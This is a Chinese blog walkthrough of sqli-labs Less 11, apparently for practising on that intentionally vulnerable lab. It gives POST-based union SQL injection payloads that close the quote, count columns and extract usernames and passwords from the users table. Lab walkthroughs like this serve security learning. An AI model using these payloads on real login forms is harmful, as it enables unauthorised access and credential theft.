sqli-labs靶场 less 11

文章目录


sqli-labs靶场

每道题都从以下模板讲解,并且每个步骤都有图片,清晰明了,便于复盘。

sql注入的基本步骤

  • 注入点
  • 注入类型
    • 字符型:判断闭合方式 ('、"、''、"")
    • 数字型
  • 根据实际情况,选择合适的注入方式
  • 获取数据库名,表名,列名,数据

less 11 POS联合注入

  • 题目类型:

细节:

Post输入框中,--+注释符不起作用,#注释符可以用

判断闭合方式

输入uname= a' 提示报错 ''1'' and password='' LIMIT 0,1'

根据报错得到,and连接用户名和密码

uname=1'--+ 没有提示报错,说明闭合成功,所以闭合方式是单引号

判断列数

uname=1'order+by+3--+

uname=1'order+by+2--+

无报错,说明该页面sql语句查询返回的字段数是二列

uname=1'union+select+1,2--+

联合注入报数据

uname=1'union+select+1,(select+substr((group_concat(username,password)),1,32)+from+users)--+

通过substr截取出全部数据

相关推荐
web打印社区18 小时前
使用React如何静默打印页面:完整的前端打印解决方案
前端·javascript·vue.js·react.js·pdf·1024程序员节
喜欢踢足球的老罗18 小时前
[特殊字符] PM2 入门实战:从 0 到线上托管 React SPA
前端·react.js·前端框架
小光学长18 小时前
基于Vue的课程达成度分析系统t84pzgwk(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。
前端·数据库·vue.js
Baklib梅梅19 小时前
探码科技再获“专精特新”认定:Baklib引领AI内容管理新方向
前端·ruby on rails·前端框架·ruby
南方以南_19 小时前
Chrome开发者工具
前端·chrome
YiHanXii19 小时前
this 输出题
前端·javascript·1024程序员节
楊无好19 小时前
React中ref
前端·react.js
程琬清君19 小时前
vue3 confirm倒计时
前端·1024程序员节
歪歪10020 小时前
在C#中详细介绍一下Visual Studio中如何使用数据可视化工具
开发语言·前端·c#·visual studio code·visual studio·1024程序员节
唔6620 小时前
flutter实现web端实现效果
前端·flutter